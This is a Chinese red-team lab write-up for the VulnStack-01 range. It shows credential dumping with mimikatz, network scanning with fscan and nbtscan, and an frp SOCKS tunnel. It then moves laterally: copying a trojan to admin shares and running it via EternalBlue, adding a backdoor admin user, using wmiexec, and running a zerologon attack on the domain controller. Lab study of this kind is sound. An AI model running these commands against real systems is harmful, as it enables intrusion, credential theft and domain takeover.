VulnStack-01 ATT&CK红队评估(二)

简介: VulnStack-01 ATT&CK红队评估

二、内网信息搜集

1)logonpasswords读取密码成功

hongrisec@2019

5d32200698eeab9e6440dcac77430189_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816234346492

2)系统信息

systeminfo

主机名:           STU1
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
系统类型:         x64-based PC
域:               god.org
登录服务器:       \\OWA
修补程序:         安装了 4 个修补程序。
                  [01]: KB2534111
                  [02]: KB2999226
                  [03]: KB958488
                  [04]: KB976902

3)网卡信息

ipconfig /all

可以看出此靶机存在域中

域名:god.org
双网卡:
net1:10.0.1.5(模拟公网)
net2:192.168.52.143(可以看出这个是内网ip了)
DNS:192.168.52.138
这个DNS大概率是域控god.org的ip

309469fe5f9d46c0cdbe21cbf2e3669c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.pngimage-20210816234602114

5fbd78f83096671c9b3392cd48e20972_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210816234631555

4)端口服务信息

扫描到的东西好多啊。发现网段内存活的另外两台机器分别是138和141。三台竟然都有ms17010,没啥遗憾的,之前没有找到143这个漏洞是因为这个机器防火墙开了,外面扫不到

shell C:\Windows\Temp\fscan.exe -h 192.168.52.1/24
scan start
(ICMP) Target '192.168.52.138' is alive
(ICMP) Target '192.168.52.141' is alive
(ICMP) Target '192.168.52.143' is alive
icmp alive hosts len is: 3
192.168.52.138:135 open
192.168.52.138:80 open
192.168.52.143:135 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.143:445 open
192.168.52.138:445 open
192.168.52.141:135 open
192.168.52.141:445 open
192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]169.254.129.186
   [->]192.168.52.143
   [->]10.0.1.5
NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
192.168.52.141 MS17-010 (Windows Server 2003 3790)
NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
WebTitle:http://192.168.52.138:80 200 None
192.168.52.143:3306 open
192.168.52.141:7001 open
FTP:192.168.52.141:21:ftp admin123A
WebTitle:http://192.168.52.143:80 200 phpStudy 鎺㈤拡 2014 
192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]169.254.129.186
   [->]192.168.52.143
   [->]10.0.1.5
WebTitle:http://192.168.52.138:80 200 None
NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
192.168.52.141 MS17-010 (Windows Server 2003 3790)
192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
FTP:192.168.52.141:21:ftp admin123A

5)域内机器信息

使用CS的插件上传运行nbtscan进行扫描,或者自己上传nbtscan扫描

9713a7e37b17475a4c46bb0033d0b95b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818215517732

192.168.52.138  GOD\OWA                         SHARING DC
192.168.52.141  GOD\ROOT-TVI862UBEH             SHARING ?
192.168.52.143  GOD\STU1                        SHARING

f60e153ba3be35570ffbbdebcd1cd785_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818215550571

三、frp打隧道

(1)配置文件

靶机:

# frpc.ini
[common]
server_addr = 10.0.1.12
server_port = 11608
[http_proxy]
type = tcp
remote_port = 11668
plugin = socks5

/PS:

# frps.ini[common]bind_addr = 0.0.0.0bind_port = 11608

先在/PS建立服务端

./frps -c frps.ini

9d58a8b426eed0253d008db55e41f4ba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210817001401291

然后在靶机开启客户端

shell cd C:\Windows\Temp\ && frpc.exe -c frpc.ini

4398eb64002697bb3dd1220b8e854dba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210817002249004

kali回显

e8c4c3115da6d06c130a570665362520_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210817002312187

proxychains设置:

10.0.1.12 11668

连接测试

810d72926a2d8845fb1bf0f92edfa25f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

经过测试,ftp连接登录后,无法获取目录

167a0157303a59c1508bc042a58dc0fe_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210817004754233

四、攻击192.168.52.138

1)思路描述

(1)思考1

在攻击过程中我发现没有建立IPC的时候windows7系统的web服务器中可以直接dir列出192.168.52.138和192.168.52.141两台机器的目录,这也是靶机域环境的一个漏洞

a046843e1af28b27aba07888dba3f6fc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818220737043

2be09bec4c8f2c427728107a2396c75f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818220704119

所以,我们可以对CS会话建立192.168.52.143(切记,不能写10.0.1.5)的中转监听,生成这个监听的木马,把马传到141和138的机器,然后使用永恒之蓝运行exe木马就可以上线

copy 64.exe \\192.168.52.141\c$\windows\system32\
copy 64.exe \\192.168.52.138\c$\windows\system32\

(2)思考2

既然存在永恒之蓝漏洞,可以使用永恒之蓝漏洞新建用户并添加到本地administrators组,这里不能建立域用户。提示:建立用户是很容易被发现的~

9e319f53df33ffbb27d11385adb7a647_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818223431301

net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add

难用的方法:使用CS的会话建立IPC

net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge
# 这里发现从域普通用户IPC连接域普通用户,需要域管理员的账号才行,所以想用这个方法渗透到这个普通域用户机器需要在域控那里直接IPC连接(域信任),或者就是好用的方法wmiexec
net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge
#然后copy马过去,永恒之蓝去执行.永恒之蓝执行命令

好用的方法:通过隧道使用wmiexec连接获取shell,windows版本的wmiexec好用

wmiexec.exe ch4nge:QWEasd123@192.168.52.141
put 32.exe

60592ae102b6bd40037401ed6b1eae4b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819004521782

注意192.168.52.141是win2003,是32位系统,木马要生成32位的

38d4b0cda3430ab2b3df47ab0b941a4e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210819004556704

(3)思考3

哈希置零攻击CVE-2020-1472

上传mimikatz,CS上检测是否存在CVE-2020-1472漏洞,看图显示Authentication: OK -- vulnerable表示存在,可以用这个方式攻击域控。

注意这里的sccount从nbtscan得到

shell mimikatz "lsadump::zerologon /target:192.168.52.138 /account:OWA$" "exit"

50c5255d7923d2c0c3ee071947fb610e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818222717067

141这个报错没见过,有师傅知道报错是什么原因导致的吗

9b7624e5d13ae83eaef26dd387f46470_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

image-20210818222940630

相关文章
|
9月前
|
安全 数据安全/隐私保护
简单讲解一下什么是ATT&CK框架
简单讲解一下什么是ATT&CK框架
330 1
|
安全 Shell 数据安全/隐私保护
VulnStack-01 ATT&CK红队评估(三)
VulnStack-01 ATT&CK红队评估
189 0
VulnStack-01 ATT&CK红队评估(三)
|
NoSQL 关系型数据库 MySQL
VulnStack-01 ATT&CK红队评估(一)
VulnStack-01 ATT&CK红队评估
155 0
VulnStack-01 ATT&CK红队评估(一)
|
安全 Ubuntu 关系型数据库
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
609 0
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
|
数据库
ATT&CK框架结构之侦察
ATT&CK框架结构侦察
137 0
ATT&CK框架结构之侦察
|
传感器 存储 数据可视化
什么是ATT&CK
什么是ATT&CK
324 0
什么是ATT&CK
|
测试技术 网络安全
网络安全渗透测试的基本框架ATT&CK框架
网络安全渗透测试的基本框架ATT&CK框架
292 0
|
20天前
|
存储 关系型数据库 数据库
【DDIA笔记】【ch2】 数据模型和查询语言 -- 多对一和多对多
【6月更文挑战第7天】该文探讨数据模型,比较了“多对一”和“多对多”关系。通过使用ID而不是纯文本(如region_id代替"Greater Seattle Area"),可以实现统一、避免歧义、简化修改、支持本地化及优化搜索。在数据库设计中,需权衡冗余和范式。文档型数据库适合一对多但处理多对多复杂,若无Join,需应用程序处理。关系型数据库则通过外键和JOIN处理这些关系。文章还提及文档模型与70年代层次模型的相似性,层次模型以树形结构限制了多对多关系处理。为克服层次模型局限,发展出了关系模型和网状模型。
24 6
|
22天前
|
XML NoSQL 数据库
【DDIA笔记】【ch2】 数据模型和查询语言 -- 概念 + 数据模型
【6月更文挑战第5天】本文探讨了数据模型的分析,关注点包括数据元素、关系及不同类型的模型(关系、文档、图)与Schema模式。查询语言的考量涉及与数据模型的关联及声明式与命令式编程。数据模型从应用开发者到硬件工程师的各抽象层次中起着简化复杂性的关键作用,理想模型应具备简洁直观和可组合性。
15 2
|
19天前
|
SQL 人工智能 关系型数据库
【DDIA笔记】【ch2】 数据模型和查询语言 -- 文档模型中Schema的灵活性
【6月更文挑战第8天】网状模型是层次模型的扩展,允许节点有多重父节点,但导航复杂,需要预知数据库结构。关系模型将数据组织为元组和关系,强调声明式查询,解耦查询语句与执行路径,简化了访问并通过查询优化器提高效率。文档型数据库适合树形结构数据,提供弱模式灵活性,但在Join支持和访问局部性上不如关系型。关系型数据库通过外键和Join处理多对多关系,适合高度关联数据。文档型数据库的模式灵活性体现在schema-on-read,写入时不校验,读取时解析,牺牲性能换取灵活性。适用于不同类型或结构变化的数据场景。
19 0

热门文章

最新文章